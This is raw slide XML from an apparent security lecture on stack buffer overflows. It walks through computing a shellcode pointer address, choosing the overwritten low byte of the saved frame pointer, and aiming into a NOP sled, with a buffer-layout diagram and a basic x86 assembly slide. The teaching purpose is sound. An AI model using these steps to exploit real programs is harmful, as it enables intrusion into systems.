      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155043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84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84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84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84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84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84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845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845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2845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28451">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28451">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28451">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2845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0434" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Determining &amp;&amp;shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1170435" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From the buffer address, we have to determine where the four bytes containing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> address are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add 256 bytes to account for the buffer length</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Subtract 4 bytes for size of pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 0xbffffc64 + 0x100 - 0x04 = 0xbffffd60</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49905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0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70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70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70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498" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Computing the Overflowing Byte </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>and &amp;shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1130499" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With high likelihood, the most significant 3 bytes of %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> are the same</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We want %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to be (&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - 4), since %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is incremented when %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is popped from stack (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Desired byte is (&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - 4) &amp; 0x000000ff = 0x5c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We have to choose a value to jump to in the NOP range </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Say 0xbffffc74 (16 bytes within the buffer)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102750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04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04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304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304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304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594" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Overflowed Buffer Contents</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134595" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="2514600"/>
            <a:ext cx="4648200" cy="26860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endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134596" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="4743450"/>
            <a:ext cx="4648200" cy="228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200">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134597" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="4286250"/>
            <a:ext cx="4648200" cy="228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200">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134598" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="4514850"/>
            <a:ext cx="4648200" cy="228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200">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134599" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="4057650"/>
            <a:ext cx="4648200" cy="228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200">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>shellcode starts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134600" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="3829050"/>
            <a:ext cx="4648200" cy="228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200">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134601" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="3600450"/>
            <a:ext cx="4648200" cy="228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200">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>shellcode ends</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134602" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="4972050"/>
            <a:ext cx="4648200" cy="22860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200">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>int i</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134603" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="3028950"/>
            <a:ext cx="1219200" cy="34290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200">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ebp[0]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>bf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134604" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="3028950"/>
            <a:ext cx="1219200" cy="34290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200">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ebp[1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ff</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134605" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="3028950"/>
            <a:ext cx="1219200" cy="34290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200">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ebp[2]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134606" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5638800" y="3028950"/>
            <a:ext cx="1143000" cy="3429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200">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>0x5c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134607" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="3371850"/>
            <a:ext cx="4648200" cy="228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200">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>0xbffffc74</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134609" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="4514850"/>
            <a:ext cx="1143000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>0xbffffc74</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134610" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="3371850"/>
            <a:ext cx="1143000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>0xbffffd60</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134611" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="3600450"/>
            <a:ext cx="1143000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>0xbffffd5c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1328014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498" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>x86 Assembly Language</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1002499" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Slightly) higher-level language than machine language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Program is made of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>directives: commands for the assembler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.data identifies a section with variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>instructions: actual operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0x08048f3f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two possible syntaxes, with different ordering of the operands!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AT&amp;T syntax (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, GNU Assembler)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mnemonic source, destination</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DOS/Intel syntax (Microsoft Assembler, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, IDA Pro)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mnemonic destination, source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can be set using: set disassembly-flavor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>intel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>att</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198875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24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24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24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024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024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024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0249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0249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0249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0249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02499">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0249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45" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1085850"/>
            <a:ext cx="2057400" cy="3200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1136646" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="26860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&amp;shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1136647" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="29718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shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1136648" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="37147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nop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1136649" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="40005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int i</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7404100" y="3333750"/>
            <a:ext cx="76200" cy="285750"/>
            <a:chOff x="1392" y="2880"/>
            <a:chExt cx="48" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1136651" name="Oval 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2880"/>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36652" name="Oval 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2976"/>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36653" name="Oval 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="3072"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1136654" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="21145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saved_eip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1136655" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="12001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argc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1136656" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1485900"/>
            <a:ext cx="2057400" cy="6286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argv</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1136657" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="50292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esp</a:t>
            </a:r>
